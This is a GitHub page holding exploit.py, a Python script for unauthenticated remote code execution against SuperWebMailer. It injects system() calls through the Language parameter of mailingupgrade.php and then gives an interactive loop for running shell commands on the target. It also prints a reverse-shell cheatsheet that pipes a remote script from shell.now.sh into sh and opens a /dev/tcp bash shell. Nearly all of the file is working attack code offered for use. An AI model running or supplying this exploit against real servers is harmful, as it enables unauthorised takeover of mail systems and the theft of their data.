-
Notifications
You must be signed in to change notification settings - Fork 5
/
Copy pathexploit.py
64 lines (60 loc) · 2.24 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
import requests
import sys
import urllib.parse
import argparse
req = requests.Session()
headers = {'Content-type': 'application/x-www-form-urlencoded'}
def check(target):
print("[DEBUG] Sending Payload To the Target...")
data = r"step=4&Language=de%7b$%7bsystem(%22echo asu%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E"
resp = req.post("{}/mailingupgrade.php".format(target), data=data, headers=headers)
if "asu" in resp.text and resp.status_code == 200:
print("[OK] The target is vulnerable")
print('''
+-----------[Reverse Shell Cheatsheet]-----------+
| > curl https://shell.now.sh/urip:port | sh |
| > bash -i >& /dev/tcp/urip/port 0>&1 |
+------------------------------------------------+
''')
exploit(target, "uname -a")
exploit(target, "id")
while True:
command = input("Shell Command> ")
if command == "exit":
sys.exit()
exploit(target, command)
print('''type "exit" to exit''')
else:
print("\033[91m[ERR] ANJG ENGGAK VULN :')")
def exploit(target, command):
commandEncoded = urllib.parse.quote(command)
data = r"step=4&Language=de%7b$%7bsystem(%22"+commandEncoded+r"%22)%7d%7d&RegName=12345678901234567890123&RegNumber=12345&NextBtn=Weiter+%3E"
resp = req.post("{}/mailingupgrade.php".format(target), data=data, headers=headers)
print(resp.text.replace("Can't load correct language file in /language directory", ""))
def main():
print('''
\033[94mUnauth SuperWebMailer RCE Exploit by
|\___/|
) (
=\ /=
) (
/ \
| |
/ \
\ /
\__ _/
( (
) )
(_(
\033[92m 𝓓 卂尺Ҝ 匚ㄥㄖ山几 丂乇匚ㄩ尺丨ㄒㄚ
\033[91m Autho : Mr.TenAr and ./Sandal.py
''')
parser = argparse.ArgumentParser(description='\033[96mHelp..',add_help=True)
parser.add_argument('-u', action="store", dest="target", help='target url ex. http://target.com/')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit()
check(args.target)
if __name__ == "__main__":
main()